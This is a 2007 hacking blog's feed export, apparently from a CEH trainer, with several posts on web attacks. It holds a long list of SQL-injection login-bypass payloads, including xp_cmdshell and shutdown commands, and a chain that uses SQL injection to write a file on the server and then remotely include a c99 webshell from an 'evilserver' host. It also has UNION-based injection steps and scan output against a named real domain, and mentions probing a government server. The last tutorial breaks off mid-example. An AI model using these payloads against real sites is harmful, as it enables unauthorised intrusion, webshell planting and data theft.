Today i will upload the some photos for the classes, i trained on CEH. Well, none of the photos i am displayed, so dont look for me, hehehehe.......&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_afH8IKGSEeI/RmhMWSPu1pI/AAAAAAAAAAo/1iarrqQKT5I/s1600-h/i+sit+at+the+comp+tring+to+explain+a+little+code+that+the+guy+behind+didnt+understand.JPG"&gt;&lt;img style="cursor: pointer; width: 233px; height: 174px;" src="http://bp1.blogger.com/_afH8IKGSEeI/RmhMWSPu1pI/AAAAAAAAAAo/1iarrqQKT5I/s400/i+sit+at+the+comp+tring+to+explain+a+little+code+that+the+guy+behind+didnt+understand.JPG" alt="" id="BLOGGER_PHOTO_ID_5073388925971519122" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;1.One of the students tries to get a glimpse of what is going on when a shell pops up.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_afH8IKGSEeI/Rmg1nyPu1nI/AAAAAAAAAAc/U7ONpRvqJO4/s1600-h/Some+of+the+Guyz+who+attanded+the+5+modules+of+CEH.JPG"&gt;&lt;img style="cursor: pointer; width: 253px; height: 190px;" src="http://bp3.blogger.com/_afH8IKGSEeI/Rmg1nyPu1nI/AAAAAAAAAAc/U7ONpRvqJO4/s400/Some+of+the+Guyz+who+attanded+the+5+modules+of+CEH.JPG" alt="" id="BLOGGER_PHOTO_ID_5073363937851790962" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2.Some of the students who attended.&lt;br /&gt;&lt;br /&gt;That all for now,&lt;br /&gt;&lt;br /&gt;Cheers&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-2550331490654914443?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/2550331490654914443/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=2550331490654914443' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2550331490654914443'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2550331490654914443'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/06/photos-for-ceh-five-module-training.html' title='PHOTOS FOR THE CEH, FIVE MODULE TRAINING'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_afH8IKGSEeI/RmhMWSPu1pI/AAAAAAAAAAo/1iarrqQKT5I/s72-c/i+sit+at+the+comp+tring+to+explain+a+little+code+that+the+guy+behind+didnt+understand.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7167339496979143465</id><published>2007-06-06T20:41:00.000+03:00</published><updated>2007-06-06T21:25:08.442+03:00</updated><title type='text'>CHUKSFIRE SQL INJECTION TOOL</title><content type='html'>I have been busy scripting a tool that can crawl servers looking for Vulnerable pages which can be exploited using sql-injection. Its written in perl, called chuksfire. I will be lauching it soon, i will not name the day. I'm still working on the code, but its at its BETA stage at the moment. Been busy training, thats why its not out yet. I will try probe wananchi.co.ke, i will not display the vulnerable lines, though, but one thing u need to know, sql injection, can get your network compromised. This is how it works:&lt;br /&gt;&lt;br /&gt;Starting chuksfire scan...&lt;br /&gt;&lt;br /&gt;[*] Server: Apache/1.3.33 (Darwin) mod_jk/1.2.4 DAV/1.0.3 mod_ssl/2.8.24 OpenSSL/0.9.7i PHP/4.4 .1 mod_perl/1.26&lt;br /&gt;[*] Checking robots.txt...&lt;br /&gt;[*] Checking 1 page on www.wananchi.co.ke for SQL injection holes...&lt;br /&gt;[*] Checking index.php...&lt;br /&gt;[*] Checking for possible bugs...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I will try see if, i can add up some CMS bugs in the code, so as to pick known sql-injection vulnerabilities, on well used CMSs, like Joomla, XOOPS and others.&lt;br /&gt;&lt;br /&gt;Good reading.&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7167339496979143465?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7167339496979143465/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7167339496979143465' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7167339496979143465'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7167339496979143465'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/06/chuksfire-sql-injection-tool.html' title='CHUKSFIRE SQL INJECTION TOOL'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6325703109583069153</id><published>2007-06-06T20:35:00.000+03:00</published><updated>2007-06-06T20:40:25.905+03:00</updated><title type='text'>HACKERS CODE </title><content type='html'>&lt;h2 style="color: rgb(255, 0, 0); text-align: left;" class="title"&gt;The Code&lt;/h2&gt;      &lt;div class="widget-content"&gt;     &lt;ol&gt;&lt;li&gt;Hackers share and are willing to teach their knowledge    &lt;/li&gt;&lt;li&gt;Hackers are skilled.  Many are self-taught, or learn by  interacting with other hackers.    &lt;/li&gt;&lt;li&gt;Hackers seek knowledge.  This knowledge may come from unauthorized or unusual sources, and is often hidden.    &lt;/li&gt;&lt;li&gt;Hackers are tinkerers.  They like to understand how things work, and want to make their own improvements or modifications.    &lt;/li&gt;&lt;li&gt;Hackers often disagree with authority, including parents, employers, social customs and laws. They often seek to circumvent authority they disagree with. &lt;/li&gt;&lt;li&gt;Hackers disagree with each other. Different hackers have different values, and come from all backgrounds. This means that what one hacker is opposed to might be embraced by another. &lt;/li&gt;&lt;li&gt;Hackers are persistent, and are willing to devote hours, days and years to pursuing their individual passions.    &lt;/li&gt;&lt;li&gt;This Code is not to prescribe how hackers act.  Instead, it is to help us to recognize our own diversity and identify.    &lt;/li&gt;&lt;li&gt;Every hacker must make his or her own decisions about what is right or wrong, and some might do things they believe are illegal, amoral or anti-social to achieve higher goals. &lt;/li&gt;&lt;li&gt;Hackers' motivations are their own, and there is no reason for all hackers to agree.     &lt;/li&gt;&lt;li&gt;Hackers have a shared identify, however, and many shared interests.    &lt;/li&gt;&lt;li&gt;By reading this Code, hackers can recognize themselves and each other, and understand better the group they are a part of. This will be beneficial to all hackers.&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;See u soon in Hack Dejavu, this Saturday for VIP at my security forum/mailist, the same spot, Igundas Place.&lt;br /&gt;&lt;br /&gt;Good day.&lt;br /&gt;&lt;br /&gt;/Chuks&lt;br /&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6325703109583069153?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6325703109583069153/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6325703109583069153' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6325703109583069153'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6325703109583069153'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/06/hackers-code.html' title='HACKERS CODE &lt;LIFE IN IT/&gt;'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6790331992246878019</id><published>2007-06-02T18:18:00.000+03:00</published><updated>2007-06-02T18:36:01.066+03:00</updated><title type='text'>THE IT SECURITY CONFRENCE ARRANGED BY FUTURISTIC</title><content type='html'>Hi.&lt;br /&gt;&lt;br /&gt;As most of u already know, we had the first, IT security Confrence in Kenya at Mid last month. Though we didnt cover much as expected, but hope we did a good show, and people got introduced to I.T. Security and got learn how to use a small holes to compromise the whole Server or Host.&lt;br /&gt;&lt;br /&gt;I'm sure most of u got amazed when i used a tool like metasploit and got hold the desktop of someone who is logged in. Actually, hacking with metasploit and seizing up desktops, is not so leet, mostly there are more complicated hacking styles, where u install a good connect back and no one will know u are connected or logged in. By that we use Backdoors or Rootkits. I demostrated how to use Remote File Inclusion and how to find it, in vulnerable sites, and thats where jaws dropped since you could browse the system files for the victim. "Are we already in someones Server" u would ask.&lt;br /&gt;&lt;br /&gt;Anyway hope to meet you for the upcoming CEH full course, which i will personnally train, and we will go through the 22 modules.&lt;br /&gt;&lt;br /&gt;Hope to see u soon, i will post up at my forum.&lt;br /&gt;&lt;br /&gt;Good Read.&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6790331992246878019?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6790331992246878019/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6790331992246878019' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6790331992246878019'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6790331992246878019'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/06/it-security-confrence-arranged-by.html' title='THE IT SECURITY CONFRENCE ARRANGED BY FUTURISTIC'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3441810211512335819</id><published>2007-05-15T14:34:00.000+03:00</published><updated>2007-05-15T14:37:22.053+03:00</updated><title type='text'>SQL COMMANDS, ALSO USED FOR COMPROMISE</title><content type='html'>Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions too&lt;br /&gt;On theirr own they wont exploit anything but eventually you will find an exploit that needs these and they are good to know, for injection or just to better understand how SQL works.&lt;br /&gt;&lt;br /&gt;        ABORT -- abort the current transaction&lt;br /&gt;ALTER DATABASE -- change a database&lt;br /&gt;ALTER GROUP -- add users to a group or remove users from a group&lt;br /&gt;ALTER TABLE -- change the definition of a table&lt;br /&gt;ALTER TRIGGER -- change the definition of a trigger&lt;br /&gt;ALTER USER -- change a database user account&lt;br /&gt;ANALYZE -- collect statistics about a database&lt;br /&gt;BEGIN -- start a transaction block&lt;br /&gt;CHECKPOINT -- force a transaction log checkpoint&lt;br /&gt;CLOSE -- close a cursor&lt;br /&gt;CLUSTER -- cluster a table according to an index&lt;br /&gt;COMMENT -- define or change the comment of an object&lt;br /&gt;COMMIT -- commit the current transaction&lt;br /&gt;COPY -- copy data between files and tables&lt;br /&gt;CREATE AGGREGATE -- define a new aggregate function&lt;br /&gt;CREATE CAST -- define a user-defined cast&lt;br /&gt;CREATE CONSTRAINT TRIGGER -- define a new constraint trigger&lt;br /&gt;CREATE CONVERSION -- define a user-defined conversion&lt;br /&gt;CREATE DATABASE -- create a new database&lt;br /&gt;CREATE DOMAIN -- define a new domain&lt;br /&gt;CREATE FUNCTION -- define a new function&lt;br /&gt;CREATE GROUP -- define a new user group&lt;br /&gt;CREATE INDEX -- define a new index&lt;br /&gt;CREATE LANGUAGE -- define a new procedural language&lt;br /&gt;CREATE OPERATOR -- define a new operator&lt;br /&gt;CREATE OPERATOR CLASS -- define a new operator class for indexes&lt;br /&gt;CREATE RULE -- define a new rewrite rule&lt;br /&gt;CREATE SCHEMA -- define a new schema&lt;br /&gt;CREATE SEQUENCE -- define a new sequence generator&lt;br /&gt;CREATE TABLE -- define a new table&lt;br /&gt;CREATE TABLE AS -- create a new table from the results of a query&lt;br /&gt;CREATE TRIGGER -- define a new trigger&lt;br /&gt;CREATE TYPE -- define a new data type&lt;br /&gt;CREATE USER -- define a new database user account&lt;br /&gt;CREATE VIEW -- define a new view&lt;br /&gt;DEALLOCATE -- remove a prepared query&lt;br /&gt;DECLARE -- define a cursor&lt;br /&gt;DELETE -- delete rows of a table&lt;br /&gt;DROP AGGREGATE -- remove a user-defined aggregate function&lt;br /&gt;DROP CAST -- remove a user-defined cast&lt;br /&gt;DROP CONVERSION -- remove a user-defined conversion&lt;br /&gt;DROP DATABASE -- remove a database&lt;br /&gt;DROP DOMAIN -- remove a user-defined domain&lt;br /&gt;DROP FUNCTION -- remove a user-defined function&lt;br /&gt;DROP GROUP -- remove a user group&lt;br /&gt;DROP INDEX -- remove an index&lt;br /&gt;DROP LANGUAGE -- remove a user-defined procedural language&lt;br /&gt;DROP OPERATOR -- remove a user-defined operator&lt;br /&gt;DROP OPERATOR CLASS -- remove a user-defined operator class&lt;br /&gt;DROP RULE -- remove a rewrite rule&lt;br /&gt;DROP SCHEMA -- remove a schema&lt;br /&gt;DROP SEQUENCE -- remove a sequence&lt;br /&gt;DROP TABLE -- remove a table&lt;br /&gt;DROP TRIGGER -- remove a trigger&lt;br /&gt;DROP TYPE -- remove a user-defined data type&lt;br /&gt;DROP USER -- remove a database user account&lt;br /&gt;DROP VIEW -- remove a view&lt;br /&gt;END -- commit the current transaction&lt;br /&gt;EXECUTE -- execute a prepared query&lt;br /&gt;EXPLAIN -- show the execution plan of a statement&lt;br /&gt;FETCH -- retrieve rows from a table using a cursor&lt;br /&gt;GRANT -- define access privileges&lt;br /&gt;INSERT -- create new rows in a table&lt;br /&gt;LISTEN -- listen for a notification&lt;br /&gt;LOAD -- load or reload a shared library file&lt;br /&gt;LOCK -- explicitly lock a table&lt;br /&gt;MOVE -- position a cursor on a specified row of a table&lt;br /&gt;NOTIFY -- generate a notification&lt;br /&gt;PREPARE -- create a prepared query&lt;br /&gt;REINDEX -- rebuild corrupted indexes&lt;br /&gt;RESET -- restore the value of a run-time parameter to a default value&lt;br /&gt;REVOKE -- remove access privileges&lt;br /&gt;ROLLBACK -- abort the current transaction&lt;br /&gt;SELECT -- retrieve rows from a table or view&lt;br /&gt;SELECT INTO -- create a new table from the results of a query&lt;br /&gt;SET -- change a run-time parameter&lt;br /&gt;SET CONSTRAINTS -- set the constraint mode of the current transaction&lt;br /&gt;SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session&lt;br /&gt;SET TRANSACTION -- set the characteristics of the current transaction&lt;br /&gt;SHOW -- show the value of a run-time parameter&lt;br /&gt;START TRANSACTION -- start a transaction block&lt;br /&gt;TRUNCATE -- empty a table&lt;br /&gt;UNLISTEN -- stop listening for a notification&lt;br /&gt;UPDATE -- update rows of a table&lt;br /&gt;VACUUM -- garbage-collect and optionally analyze a database       &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3441810211512335819?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3441810211512335819/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3441810211512335819' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3441810211512335819'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3441810211512335819'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/05/sql-commands-also-used-for-compromise.html' title='SQL COMMANDS, ALSO USED FOR COMPROMISE'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-4519963617681126261</id><published>2007-05-10T14:10:00.000+03:00</published><updated>2007-05-10T15:05:23.791+03:00</updated><title type='text'>ANSWERING THE QUESTIONS ON SQLINJECTION AND BUILDING IN AN RFI SCRIPT IN HOUSE</title><content type='html'>These are on the comments and previews done, so i will try explain the way i can best about it.&lt;br /&gt;&lt;br /&gt;They best way to defend it is to have port 3306 filtered.....(check that server, top goverment but one of the most  insecure) mail me if u need the ip.&lt;br /&gt;&lt;br /&gt;slax ~ # nmap -sS -P0 XXX.XXX.XXX.XXX&lt;br /&gt;&lt;br /&gt;Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-05-10 12:02 EAT&lt;br /&gt;&lt;br /&gt;PORT      STATE  SERVICE&lt;br /&gt;21/tcp    open   ftp&lt;br /&gt;22/tcp    open   ssh&lt;br /&gt;80/tcp    open   http&lt;br /&gt;143/tcp   closed imap&lt;br /&gt;443/tcp   open   https&lt;br /&gt;631/tcp   closed ipp&lt;br /&gt;3306/tcp   open  mysql&lt;br /&gt;10000/tcp closed snet-sensor-mgmt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;.........and have the latest Kernel patch in your Box. Aslong as an RFI bug may be in yah site, or lets say your CMS, a knowledgable hacker will still get thru, so even a strong password wouldn't be a big deal if he is browsing your server on Port 80. The only thing that really helped last year from these kind of attacks was to have yah php safe_mode ON (secure) but these days there are so many ways of bypassing it, Lol!&lt;br /&gt;&lt;br /&gt;This was well shown after the month of PHP bugs, January and Feb this year after the release of alot of POCs to the public by Hardened PHP and other communities.&lt;br /&gt;&lt;br /&gt;To all, the best way to secure yah BOX, is to know how an intruder will get thru, by doing all types of Pentest Attacks, whether Black Box or White Box penetration testing.&lt;br /&gt;&lt;br /&gt;Something else, before i go, SQL INJECTION, can help an attacker to build up an RFI attack on a server, by tring an injection where he is able to browse files:  load_file('etc/password') and create his RFI by crafting an injection like:&lt;br /&gt;&lt;br /&gt;www.site.com/vulnerablescripts.php?id=-1+union+select&lt;br /&gt;+',1,2,3,4+from+mysql.user/**/into/**/outfile/**/'/home&lt;br /&gt;/www/public/http/vul.php'/*&lt;br /&gt;&lt;br /&gt;So we will have another file in the server named vul.php, which will have a straight rfi bug.&lt;br /&gt;&lt;br /&gt;So remote include with a c99shell,or c100, r57 and other privated moded webshells.&lt;br /&gt;&lt;br /&gt;www.site.com/vul.php?cmd=http://evilserver/c99.txt&lt;br /&gt;&lt;br /&gt;Just a simple one, though there are more complex ones that needs alot experience.&lt;br /&gt;&lt;br /&gt;Tried to explain in Example.&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-4519963617681126261?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/4519963617681126261/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=4519963617681126261' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4519963617681126261'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4519963617681126261'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/05/answering-questions-on-sqlinjection-and.html' title='ANSWERING THE QUESTIONS ON SQLINJECTION AND BUILDING IN AN RFI SCRIPT IN HOUSE'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-1028052422406242132</id><published>2007-04-28T22:23:00.000+03:00</published><updated>2007-04-28T22:31:52.494+03:00</updated><title type='text'>INJECTIONS, ATTACKING ASP LOGIN PAGES</title><content type='html'>Hi,&lt;br /&gt;&lt;br /&gt;I have been looking into alot of attacks, especially the shopadmin, on the login pages and other sites using different CMS and running ASP.NET, and i have seen that most of the sites especially hosted by the ISPs, haven't just been hosted but archived, and the admins haven't even thought about how secure their login pages are. In this articles, i will share with you some logins attemps, an attacker will use, try with and gain administration.&lt;br /&gt;&lt;br /&gt;Username: admin'--&lt;br /&gt;username: ' or 1=1--&lt;br /&gt;&lt;br /&gt;Username : admin&lt;br /&gt;Password : admin' or a&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Username : admin&lt;br /&gt;Password : admin' or a=a --&lt;br /&gt;&lt;br /&gt;user='' or ''=''&lt;br /&gt;pass= '' or ''=''&lt;br /&gt;&lt;br /&gt;- Login: hi' or 1=1--&lt;br /&gt;- pass: hi' or 1=1--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Username: '; shutdown with nowait; --&lt;br /&gt;&lt;br /&gt;Username: '; exec master..xp_xxx; --&lt;br /&gt;&lt;br /&gt;Username: '; exec master..xp_cmdshell 'iisreset'; --&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;username = admin' or '6'='6&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;' or ''='&lt;br /&gt;&lt;br /&gt;"'or''='"&lt;br /&gt;&lt;br /&gt;'or"='&lt;br /&gt;&lt;br /&gt;9,9,9&lt;br /&gt;&lt;br /&gt;' or '&lt;br /&gt;&lt;br /&gt;or 1=1?&lt;br /&gt;&lt;br /&gt;or 1=1 --'&lt;br /&gt;&lt;br /&gt;' or 'a'='a&lt;br /&gt;&lt;br /&gt;admin'--&lt;br /&gt;&lt;br /&gt;' or 0=0 --&lt;br /&gt;&lt;br /&gt;" or 0=0 --&lt;br /&gt;&lt;br /&gt;or 0=0 --&lt;br /&gt;&lt;br /&gt;' or 0=0 #&lt;br /&gt;&lt;br /&gt;" or 0=0 #&lt;br /&gt;&lt;br /&gt;' or 'x'='x&lt;br /&gt;&lt;br /&gt;') or ('x'='x&lt;br /&gt;&lt;br /&gt;' or 1=1--&lt;br /&gt;&lt;br /&gt;" or 1=1--&lt;br /&gt;&lt;br /&gt;or 1=1--&lt;br /&gt;&lt;br /&gt;' or a=a--&lt;br /&gt;&lt;br /&gt;" or "a"="a&lt;br /&gt;&lt;br /&gt;') or ('a'='a&lt;br /&gt;&lt;br /&gt;") or ("a"="a&lt;br /&gt;&lt;br /&gt;Chintan ' --&lt;br /&gt;&lt;br /&gt;Chintan " --&lt;br /&gt;&lt;br /&gt;' OR 1=1 ?&lt;br /&gt;&lt;br /&gt;hi' or 'a'='a&lt;br /&gt;&lt;br /&gt;hi" or "a"="a&lt;br /&gt;&lt;br /&gt;hi" or 1=1 --&lt;br /&gt;&lt;br /&gt;hi' or 1=1 --&lt;br /&gt;&lt;br /&gt;hi' or 'a'='a&lt;br /&gt;&lt;br /&gt;hi') or ('a'='a&lt;br /&gt;&lt;br /&gt;hi") or ("a"="a&lt;br /&gt;&lt;br /&gt;admin' or a=a --&lt;br /&gt;&lt;br /&gt;admin" or "a"="a&lt;br /&gt;&lt;br /&gt;admin" or 1=1 --&lt;br /&gt;&lt;br /&gt;admin' or 1=1 --&lt;br /&gt;&lt;br /&gt;admin' or 'a'='a&lt;br /&gt;&lt;br /&gt;admin') or ('a'='a&lt;br /&gt;&lt;br /&gt;admin") or ("a"="a&lt;br /&gt;&lt;br /&gt;These are about enough, so test your login pages and drop me a mail, incase u find these helpful.&lt;br /&gt;&lt;br /&gt;Good weekend,&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-1028052422406242132?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/1028052422406242132/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=1028052422406242132' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/1028052422406242132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/1028052422406242132'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/04/injections-attacking-asp-login-pages.html' title='INJECTIONS, ATTACKING ASP LOGIN PAGES'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3998542914900441742</id><published>2007-04-18T12:46:00.000+03:00</published><updated>2007-04-18T14:09:58.593+03:00</updated><title type='text'>SQL INJECTIONS</title><content type='html'>This is a vulnerability alot of hackers use, when attacking webservers. By webservers in mean, applications running IIS or Apache, which are commonly used for hosting sites. This attack simply allows an attacker to alter backend SQL statements by manipulating the user input. To learn more about sql injection, there ara alot of white papers on the net that can really help. See these pages,&lt;br /&gt;&lt;br /&gt;http://www.acunetix.com/websitesecurity/sql-injection.htm&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.securiteam.com/securityreviews/5NP011FIUG.html&lt;br /&gt;&lt;br /&gt;http://www.securiteam.com/securityreviews/5IP030K8AA.html&lt;br /&gt;&lt;br /&gt;http://unixwiz.net/techtips/sql-injection.html&lt;br /&gt;&lt;br /&gt;http://www.owasp.org/index.php/PHP_Top_5&lt;br /&gt;&lt;br /&gt;And many others online&lt;br /&gt;&lt;br /&gt;lets take an example on php, aite?&lt;br /&gt;&lt;br /&gt;Let say our site is www.sitevulnerable.com/index.php&lt;br /&gt;Index php is vulnerable to sql injection. So how would we attack. www.sitevulnerable.com/index.php?id=-1&lt;br /&gt;&lt;br /&gt;Maybe u are asking me why 1, you can use any number 1010101, wateva&lt;br /&gt;&lt;br /&gt;The inject above may give an error, and actually these errors are the one i will use to pick up passwords, tables etc.&lt;br /&gt;&lt;br /&gt;So we go on by enumerating the tables&lt;br /&gt;&lt;br /&gt;www.sitevulnerable.com/index.php?id=-1 union select 1/*&lt;br /&gt;&lt;br /&gt;We are using /* to close the query so as to grep in db.&lt;br /&gt;&lt;br /&gt;So we will continue adding up like this until we get an output that will help us.&lt;br /&gt;&lt;br /&gt;www.sitevulnerable.com/index.php?id=-1 union select 1,2/*&lt;br /&gt;&lt;br /&gt;Remember with this we are just grep db of id 1, which probably is root&lt;br /&gt;&lt;br /&gt;www.sitevulnerable.com/index.php?id=-1 union select 4,3,2,1/*&lt;br /&gt;&lt;br /&gt;and then i get an error like&lt;br /&gt;&lt;br /&gt;&lt;span class="style4"&gt;3&lt;/span&gt;&lt;br /&gt;         &lt;br /&gt;            &lt;span 